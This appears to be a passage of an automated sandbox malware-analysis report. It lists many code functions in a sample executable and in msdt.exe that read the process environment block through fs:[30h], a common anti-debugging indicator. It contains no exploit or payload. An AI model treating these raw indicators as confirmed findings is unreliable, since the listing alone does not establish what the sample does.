Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_0173C577 mov eax, dword ptr fs:[00000030h]	0_2_0173C577
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01737D50 mov eax, dword ptr fs:[00000030h]	0_2_01737D50
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01753D43 mov eax, dword ptr fs:[00000030h]	0_2_01753D43
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01793540 mov eax, dword ptr fs:[00000030h]	0_2_01793540
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_0171AD30 mov eax, dword ptr fs:[00000030h]	0_2_0171AD30
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017DE539 mov eax, dword ptr fs:[00000030h]	0_2_017DE539
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01723D34 mov eax, dword ptr fs:[00000030h]	0_2_01723D34
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01723D34 mov eax, dword ptr fs:[00000030h]	0_2_01723D34
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01723D34 mov eax, dword ptr fs:[00000030h]	0_2_01723D34
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01723D34 mov eax, dword ptr fs:[00000030h]	0_2_01723D34
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01723D34 mov eax, dword ptr fs:[00000030h]	0_2_01723D34
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01723D34 mov eax, dword ptr fs:[00000030h]	0_2_01723D34
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01723D34 mov eax, dword ptr fs:[00000030h]	0_2_01723D34
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01723D34 mov eax, dword ptr fs:[00000030h]	0_2_01723D34
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01723D34 mov eax, dword ptr fs:[00000030h]	0_2_01723D34
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01723D34 mov eax, dword ptr fs:[00000030h]	0_2_01723D34
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01723D34 mov eax, dword ptr fs:[00000030h]	0_2_01723D34
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01723D34 mov eax, dword ptr fs:[00000030h]	0_2_01723D34
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01723D34 mov eax, dword ptr fs:[00000030h]	0_2_01723D34
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017E8D34 mov eax, dword ptr fs:[00000030h]	0_2_017E8D34
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_0179A537 mov eax, dword ptr fs:[00000030h]	0_2_0179A537
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01744D3B mov eax, dword ptr fs:[00000030h]	0_2_01744D3B
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01744D3B mov eax, dword ptr fs:[00000030h]	0_2_01744D3B
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01744D3B mov eax, dword ptr fs:[00000030h]	0_2_01744D3B
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017C8DF1 mov eax, dword ptr fs:[00000030h]	0_2_017C8DF1
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_0172D5E0 mov eax, dword ptr fs:[00000030h]	0_2_0172D5E0
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_0172D5E0 mov eax, dword ptr fs:[00000030h]	0_2_0172D5E0
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017DFDE2 mov eax, dword ptr fs:[00000030h]	0_2_017DFDE2
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017DFDE2 mov eax, dword ptr fs:[00000030h]	0_2_017DFDE2
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017DFDE2 mov eax, dword ptr fs:[00000030h]	0_2_017DFDE2
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017DFDE2 mov eax, dword ptr fs:[00000030h]	0_2_017DFDE2
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AF20A0 mov eax, dword ptr fs:[00000030h]	2_2_04AF20A0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AF20A0 mov eax, dword ptr fs:[00000030h]	2_2_04AF20A0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AF20A0 mov eax, dword ptr fs:[00000030h]	2_2_04AF20A0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AF20A0 mov eax, dword ptr fs:[00000030h]	2_2_04AF20A0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AF20A0 mov eax, dword ptr fs:[00000030h]	2_2_04AF20A0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AF20A0 mov eax, dword ptr fs:[00000030h]	2_2_04AF20A0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AFF0BF mov ecx, dword ptr fs:[00000030h]	2_2_04AFF0BF
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AFF0BF mov eax, dword ptr fs:[00000030h]	2_2_04AFF0BF
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AFF0BF mov eax, dword ptr fs:[00000030h]	2_2_04AFF0BF
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B090AF mov eax, dword ptr fs:[00000030h]	2_2_04B090AF
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AC9080 mov eax, dword ptr fs:[00000030h]	2_2_04AC9080
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B43884 mov eax, dword ptr fs:[00000030h]	2_2_04B43884
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B43884 mov eax, dword ptr fs:[00000030h]	2_2_04B43884
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AD849B mov eax, dword ptr fs:[00000030h]	2_2_04AD849B
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AC58EC mov eax, dword ptr fs:[00000030h]	2_2_04AC58EC
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B814FB mov eax, dword ptr fs:[00000030h]	2_2_04B814FB
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B46CF0 mov eax, dword ptr fs:[00000030h]	2_2_04B46CF0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B46CF0 mov eax, dword ptr fs:[00000030h]	2_2_04B46CF0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B46CF0 mov eax, dword ptr fs:[00000030h]	2_2_04B46CF0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B5B8D0 mov eax, dword ptr fs:[00000030h]	2_2_04B5B8D0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B5B8D0 mov ecx, dword ptr fs:[00000030h]	2_2_04B5B8D0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B5B8D0 mov eax, dword ptr fs:[00000030h]	2_2_04B5B8D0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B5B8D0 mov eax, dword ptr fs:[00000030h]	2_2_04B5B8D0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B5B8D0 mov eax, dword ptr fs:[00000030h]	2_2_04B5B8D0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B5B8D0 mov eax, dword ptr fs:[00000030h]	2_2_04B5B8D0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B98CD6 mov eax, dword ptr fs:[00000030h]	2_2_04B98CD6
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AF002D mov eax, dword ptr fs:[00000030h]	2_2_04AF002D
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AF002D mov eax, dword ptr fs:[00000030h]	2_2_04AF002D
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AF002D mov eax, dword ptr fs:[00000030h]	2_2_04AF002D
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AF002D mov eax, dword ptr fs:[00000030h]	2_2_04AF002D
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AF002D mov eax, dword ptr fs:[00000030h]	2_2_04AF002D
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AFBC2C mov eax, dword ptr fs:[00000030h]	2_2_04AFBC2C
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04ADB02A mov eax, dword ptr fs:[00000030h]	2_2_04ADB02A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04ADB02A mov eax, dword ptr fs:[00000030h]	2_2_04ADB02A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04ADB02A mov eax, dword ptr fs:[00000030h]	2_2_04ADB02A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04ADB02A mov eax, dword ptr fs:[00000030h]	2_2_04ADB02A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B47016 mov eax, dword ptr fs:[00000030h]	2_2_04B47016
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B47016 mov eax, dword ptr fs:[00000030h]	2_2_04B47016
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B47016 mov eax, dword ptr fs:[00000030h]	2_2_04B47016
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B94015 mov eax, dword ptr fs:[00000030h]	2_2_04B94015
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B94015 mov eax, dword ptr fs:[00000030h]	2_2_04B94015
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B9740D mov eax, dword ptr fs:[00000030h]	2_2_04B9740D
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B9740D mov eax, dword ptr fs:[00000030h]	2_2_04B9740D
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B9740D mov eax, dword ptr fs:[00000030h]	2_2_04B9740D
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B81C06 mov eax, dword ptr fs:[00000030h]	2_2_04B81C06
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B81C06 mov eax, dword ptr fs:[00000030h]	2_2_04B81C06
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B81C06 mov eax, dword ptr fs:[00000030h]	2_2_04B81C06
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B81C06 mov eax, dword ptr fs:[00000030h]	2_2_04B81C06
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B81C06 mov eax, dword ptr fs:[00000030h]	2_2_04B81C06
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B81C06 mov eax, dword ptr fs:[00000030h]	2_2_04B81C06
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B81C06 mov eax, dword ptr fs:[00000030h]	2_2_04B81C06
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B81C06 mov eax, dword ptr fs:[00000030h]	2_2_04B81C06
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B81C06 mov eax, dword ptr fs:[00000030h]	2_2_04B81C06
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B81C06 mov eax, dword ptr fs:[00000030h]	2_2_04B81C06
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B81C06 mov eax, dword ptr fs:[00000030h]	2_2_04B81C06
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B81C06 mov eax, dword ptr fs:[00000030h]	2_2_04B81C06
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B81C06 mov eax, dword ptr fs:[00000030h]	2_2_04B81C06
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B81C06 mov eax, dword ptr fs:[00000030h]	2_2_04B81C06
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B46C0A mov eax, dword ptr fs:[00000030h]	2_2_04B46C0A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B46C0A mov eax, dword ptr fs:[00000030h]	2_2_04B46C0A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B46C0A mov eax, dword ptr fs:[00000030h]	2_2_04B46C0A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B46C0A mov eax, dword ptr fs:[00000030h]	2_2_04B46C0A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AE746D mov eax, dword ptr fs:[00000030h]	2_2_04AE746D
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B82073 mov eax, dword ptr fs:[00000030h]	2_2_04B82073
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B91074 mov eax, dword ptr fs:[00000030h]	2_2_04B91074
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AFA44B mov eax, dword ptr fs:[00000030h]	2_2_04AFA44B
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B5C450 mov eax, dword ptr fs:[00000030h]	2_2_04B5C450
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B5C450 mov eax, dword ptr fs:[00000030h]	2_2_04B5C450
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AE0050 mov eax, dword ptr fs:[00000030h]	2_2_04AE0050
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AE0050 mov eax, dword ptr fs:[00000030h]	2_2_04AE0050
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B451BE mov eax, dword ptr fs:[00000030h]	2_2_04B451BE
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B451BE mov eax, dword ptr fs:[00000030h]	2_2_04B451BE
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B451BE mov eax, dword ptr fs:[00000030h]	2_2_04B451BE
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B451BE mov eax, dword ptr fs:[00000030h]	2_2_04B451BE
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AF35A1 mov eax, dword ptr fs:[00000030h]	2_2_04AF35A1
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AF61A0 mov eax, dword ptr fs:[00000030h]	2_2_04AF61A0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AF61A0 mov eax, dword ptr fs:[00000030h]	2_2_04AF61A0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B469A6 mov eax, dword ptr fs:[00000030h]	2_2_04B469A6
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B905AC mov eax, dword ptr fs:[00000030h]	2_2_04B905AC
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B905AC mov eax, dword ptr fs:[00000030h]	2_2_04B905AC
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AF1DB5 mov eax, dword ptr fs:[00000030h]	2_2_04AF1DB5
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AF1DB5 mov eax, dword ptr fs:[00000030h]	2_2_04AF1DB5
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AF1DB5 mov eax, dword ptr fs:[00000030h]	2_2_04AF1DB5
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AC2D8A mov eax, dword ptr fs:[00000030h]	2_2_04AC2D8A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AC2D8A mov eax, dword ptr fs:[00000030h]	2_2_04AC2D8A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AC2D8A mov eax, dword ptr fs:[00000030h]	2_2_04AC2D8A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AC2D8A mov eax, dword ptr fs:[00000030h]	2_2_04AC2D8A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AC2D8A mov eax, dword ptr fs:[00000030h]	2_2_04AC2D8A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AFA185 mov eax, dword ptr fs:[00000030h]	2_2_04AFA185
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AEC182 mov eax, dword ptr fs:[00000030h]	2_2_04AEC182
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AF2581 mov eax, dword ptr fs:[00000030h]	2_2_04AF2581
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AF2581 mov eax, dword ptr fs:[00000030h]	2_2_04AF2581
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AF2581 mov eax, dword ptr fs:[00000030h]	2_2_04AF2581
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AF2581 mov eax, dword ptr fs:[00000030h]	2_2_04AF2581
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AFFD9B mov eax, dword ptr fs:[00000030h]	2_2_04AFFD9B
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AFFD9B mov eax, dword ptr fs:[00000030h]	2_2_04AFFD9B
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AF2990 mov eax, dword ptr fs:[00000030h]	2_2_04AF2990
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B78DF1 mov eax, dword ptr fs:[00000030h]	2_2_04B78DF1
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04ACB1E1 mov eax, dword ptr fs:[00000030h]	2_2_04ACB1E1
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04ACB1E1 mov eax, dword ptr fs:[00000030h]	2_2_04ACB1E1
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04ACB1E1 mov eax, dword ptr fs:[00000030h]	2_2_04ACB1E1
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04ADD5E0 mov eax, dword ptr fs:[00000030h]	2_2_04ADD5E0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04ADD5E0 mov eax, dword ptr fs:[00000030h]	2_2_04ADD5E0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B8FDE2 mov eax, dword ptr fs:[00000030h]	2_2_04B8FDE2
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B8FDE2 mov eax, dword ptr fs:[00000030h]	2_2_04B8FDE2
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B8FDE2 mov eax, dword ptr fs:[00000030h]	2_2_04B8FDE2
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B8FDE2 mov eax, dword ptr fs:[00000030h]	2_2_04B8FDE2
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B541E8 mov eax, dword ptr fs:[00000030h]	2_2_04B541E8
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B46DC9 mov eax, dword ptr fs:[00000030h]	2_2_04B46DC9
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B46DC9 mov eax, dword ptr fs:[00000030h]	2_2_04B46DC9
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B46DC9 mov eax, dword ptr fs:[00000030h]	2_2_04B46DC9
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B46DC9 mov ecx, dword ptr fs:[00000030h]	2_2_04B46DC9
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B46DC9 mov eax, dword ptr fs:[00000030h]	2_2_04B46DC9
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B46DC9 mov eax, dword ptr fs:[00000030h]	2_2_04B46DC9
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B8E539 mov eax, dword ptr fs:[00000030h]	2_2_04B8E539
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B4A537 mov eax, dword ptr fs:[00000030h]	2_2_04B4A537
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B98D34 mov eax, dword ptr fs:[00000030h]	2_2_04B98D34
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AE4120 mov eax, dword ptr fs:[00000030h]	2_2_04AE4120
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AE4120 mov eax, dword ptr fs:[00000030h]	2_2_04AE4120
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AE4120 mov eax, dword ptr fs:[00000030h]	2_2_04AE4120
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AE4120 mov eax, dword ptr fs:[00000030h]	2_2_04AE4120
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AE4120 mov ecx, dword ptr fs:[00000030h]	2_2_04AE4120
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AF4D3B mov eax, dword ptr fs:[00000030h]	2_2_04AF4D3B
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AF4D3B mov eax, dword ptr fs:[00000030h]	2_2_04AF4D3B
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AF4D3B mov eax, dword ptr fs:[00000030h]	2_2_04AF4D3B
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AF513A mov eax, dword ptr fs:[00000030h]	2_2_04AF513A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AF513A mov eax, dword ptr fs:[00000030h]	2_2_04AF513A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AD3D34 mov eax, dword ptr fs:[00000030h]	2_2_04AD3D34
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AD3D34 mov eax, dword ptr fs:[00000030h]	2_2_04AD3D34
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AD3D34 mov eax, dword ptr fs:[00000030h]	2_2_04AD3D34
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AD3D34 mov eax, dword ptr fs:[00000030h]	2_2_04AD3D34
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AD3D34 mov eax, dword ptr fs:[00000030h]	2_2_04AD3D34
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AD3D34 mov eax, dword ptr fs:[00000030h]	2_2_04AD3D34
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AD3D34 mov eax, dword ptr fs:[00000030h]	2_2_04AD3D34
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AD3D34 mov eax, dword ptr fs:[00000030h]	2_2_04AD3D34
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AD3D34 mov eax, dword ptr fs:[00000030h]	2_2_04AD3D34
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AD3D34 mov eax, dword ptr fs:[00000030h]	2_2_04AD3D34
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AD3D34 mov eax, dword ptr fs:[00000030h]	2_2_04AD3D34
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AD3D34 mov eax, dword ptr fs:[00000030h]	2_2_04AD3D34
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AD3D34 mov eax, dword ptr fs:[00000030h]	2_2_04AD3D34
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04ACAD30 mov eax, dword ptr fs:[00000030h]	2_2_04ACAD30
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AC9100 mov eax, dword ptr fs:[00000030h]	2_2_04AC9100
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AC9100 mov eax, dword ptr fs:[00000030h]	2_2_04AC9100
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AC9100 mov eax, dword ptr fs:[00000030h]	2_2_04AC9100
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04ACC962 mov eax, dword ptr fs:[00000030h]	2_2_04ACC962
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AEC577 mov eax, dword ptr fs:[00000030h]	2_2_04AEC577
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AEC577 mov eax, dword ptr fs:[00000030h]	2_2_04AEC577
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04ACB171 mov eax, dword ptr fs:[00000030h]	2_2_04ACB171
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04ACB171 mov eax, dword ptr fs:[00000030h]	2_2_04ACB171
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AEB944 mov eax, dword ptr fs:[00000030h]	2_2_04AEB944
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AEB944 mov eax, dword ptr fs:[00000030h]	2_2_04AEB944
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B03D43 mov eax, dword ptr fs:[00000030h]	2_2_04B03D43
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B43540 mov eax, dword ptr fs:[00000030h]	2_2_04B43540
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AE7D50 mov eax, dword ptr fs:[00000030h]	2_2_04AE7D50
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AC52A5 mov eax, dword ptr fs:[00000030h]	2_2_04AC52A5
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AC52A5 mov eax, dword ptr fs:[00000030h]	2_2_04AC52A5
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AC52A5 mov eax, dword ptr fs:[00000030h]	2_2_04AC52A5
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AC52A5 mov eax, dword ptr fs:[00000030h]	2_2_04AC52A5
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AC52A5 mov eax, dword ptr fs:[00000030h]	2_2_04AC52A5
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B446A7 mov eax, dword ptr fs:[00000030h]	2_2_04B446A7
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B90EA5 mov eax, dword ptr fs:[00000030h]	2_2_04B90EA5
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B90EA5 mov eax, dword ptr fs:[00000030h]	2_2_04B90EA5
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B90EA5 mov eax, dword ptr fs:[00000030h]	2_2_04B90EA5
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04ADAAB0 mov eax, dword ptr fs:[00000030h]	2_2_04ADAAB0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04ADAAB0 mov eax, dword ptr fs:[00000030h]	2_2_04ADAAB0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AFFAB0 mov eax, dword ptr fs:[00000030h]	2_2_04AFFAB0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B5FE87 mov eax, dword ptr fs:[00000030h]	2_2_04B5FE87
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AFD294 mov eax, dword ptr fs:[00000030h]	2_2_04AFD294
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AFD294 mov eax, dword ptr fs:[00000030h]	2_2_04AFD294
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AF2AE4 mov eax, dword ptr fs:[00000030h]	2_2_04AF2AE4
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AF16E0 mov ecx, dword ptr fs:[00000030h]	2_2_04AF16E0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AD76E2 mov eax, dword ptr fs:[00000030h]	2_2_04AD76E2
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AF36CC mov eax, dword ptr fs:[00000030h]	2_2_04AF36CC
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AF2ACB mov eax, dword ptr fs:[00000030h]	2_2_04AF2ACB
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B98ED6 mov eax, dword ptr fs:[00000030h]	2_2_04B98ED6
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B7FEC0 mov eax, dword ptr fs:[00000030h]	2_2_04B7FEC0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B08EC7 mov eax, dword ptr fs:[00000030h]	2_2_04B08EC7
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B7FE3F mov eax, dword ptr fs:[00000030h]	2_2_04B7FE3F
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04ACE620 mov eax, dword ptr fs:[00000030h]	2_2_04ACE620
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B04A2C mov eax, dword ptr fs:[00000030h]	2_2_04B04A2C
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B04A2C mov eax, dword ptr fs:[00000030h]	2_2_04B04A2C
